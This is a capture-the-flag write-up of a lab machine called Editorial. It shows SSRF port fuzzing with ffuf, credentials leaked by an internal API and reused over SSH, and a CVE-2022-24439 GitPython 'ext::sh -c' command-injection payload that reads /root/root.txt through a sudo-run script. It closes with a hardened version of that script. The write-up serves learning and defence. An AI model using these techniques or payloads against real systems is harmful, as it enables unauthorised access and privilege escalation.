Enumeration
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_ 256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There is a web server.
Add editorial.htb to the hosts file and check the web page.
There's an upload page. Maybe I can do something here.
I found that when I click the preview button after entering a URL, the value of bookurl becomes something like a UUID.
It doesn't do anything interesting beyond that. I tried localhost and it returned a UUID as well.
The next move I could think of was to try different port numbers.
Fuzzing
Get the raw request from Burp and put the FUZZ keyword in the place I want to fuzz.
POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://editorial.htb/upload
Content-Type: multipart/form-data; boundary=---------------------------254948236236811770141700562744
Content-Length: 359
Origin: http://editorial.htb
DNT: 1
Connection: close
Sec-GPC: 1

-----------------------------254948236236811770141700562744
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:FUZZ
-----------------------------254948236236811770141700562744
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------254948236236811770141700562744--
Since I will check port numbers, I made a port number list from 1 to 10000.
#!/bin/bash
# Write one candidate port per line; the ffuf command reads this as num.txt.
for i in {1..10000}
do
  echo "$i" >> num.txt
done
And run ffuf.
ffuf -request request.txt -u http://editorial.htb/upload-cover -w num.txt -X POST -fs 61
Then I got the following result.
User flag
If we send the request with 127.0.0.1:5000, the following file is downloaded.
fd303796-e240-4e5b-b7f7-d0b9d98fd02c
If you check the file, you will see the API endpoints.
Check all the APIs using Burp. One of them returns credentials.
Username: dev\nPassword: dev080217_devAPI!@
I used the credential to SSH.
Root flag
git show
{commit}
The password is 080217_Producti0n_2023!@
I managed to switch user to prod, but didn't have permission to access root.
But I found the user can run a command with sudo.
When I run the command with sudo, it says I can’t run it.
Ok, let’s see what is written in the file.
#!/usr/bin/python3
import os
import sys
from git import Repo

# Work inside the internal clone directory.
os.chdir('/opt/internal_apps/clone_changes')

# The clone URL comes straight from the first command-line argument, unvalidated.
url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
# protocol.ext.allow=always lets git use the ext:: transport for this clone.
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
It imports Repo from GitPython and clones a repository from the URL passed as the first argument when the script is executed.
What else can I find? How about checking the library versions?
Ok, I see GitPython version 3.1.29.
And that version has a known vulnerability: CVE-2022-24439.
from git import Repo
r = Repo.init('', bare=True)
r.clone_from('ext::sh -c touch% /tmp/pwned', 'tmp', multi_options=["-c protocol.ext.allow=always"])
When I executed it with the payload, I could see /tmp/pwned had been created. So the command works.
Another point is that % is used as a space. Ok, then I can decide on the command that I want.
How about this?
ext::sh -c cat% /root/root.txt% >% /tmp/pwned
Then I can see the root flag is copied in the pwned file!
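As an added example (not the box's script and not code from the writeup), here is a hardened version of the clone_changes helper: it accepts only http(s) URLs to an allow-listed host and never enables protocol.ext.allow, so an ext:: argument is refused before GitPython sees it. The validate_clone_url and clone_if_safe functions and the ALLOWED_HOSTS list are my own assumptions.

```python
#!/usr/bin/env python3
"""Hardened variant of the clone_changes helper (added example, not the box's script).

The original hands an unvalidated argument to Repo.clone_from with
protocol.ext.allow=always, which is what CVE-2022-24439 abuses: an "ext::"
URL makes git run a local command. Here the URL is validated first and the
ext transport is never enabled.
"""
import sys
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
# Hypothetical allow-list of hosts the helper may clone from.
ALLOWED_HOSTS = {"github.com", "gitlab.com"}


def validate_clone_url(url):
    """Return (ok, reason). Only http(s) URLs to allow-listed hosts pass."""
    if url.startswith("-"):
        return False, "looks like a command-line option, not a URL"
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        # Rejects ext::, fd::, file://, ssh:// and bare local paths.
        return False, f"scheme {parsed.scheme or '(none)'!r} not allowed"
    if not parsed.hostname:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials embedded in URL are not allowed"
    if parsed.hostname.lower() not in ALLOWED_HOSTS:
        return False, f"host {parsed.hostname!r} not in allow-list"
    return True, "ok"


def clone_if_safe(url, dest="new_changes"):
    """Clone only after validation; no protocol.ext.allow override is passed."""
    ok, reason = validate_clone_url(url)
    if not ok:
        print(f"refusing to clone {url!r}: {reason}", file=sys.stderr)
        return False
    # GitPython is imported lazily so the validator can be tested without it.
    # Keep GitPython >= 3.1.30, which refuses ext:: unless allow_unsafe_protocols
    # is passed explicitly.
    from git import Repo
    Repo.clone_from(url, dest)
    return True


if __name__ == "__main__":
    sys.exit(0 if clone_if_safe(sys.argv[1]) else 1)
```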
Lesson learned
- Try localhost in suspicious input fields. Also consider that other ports may be running different services.
- The ffuf -request option was very convenient.
- git show {commit}
- pip3 list shows the versions of installed libraries. Libraries may have vulnerabilities too.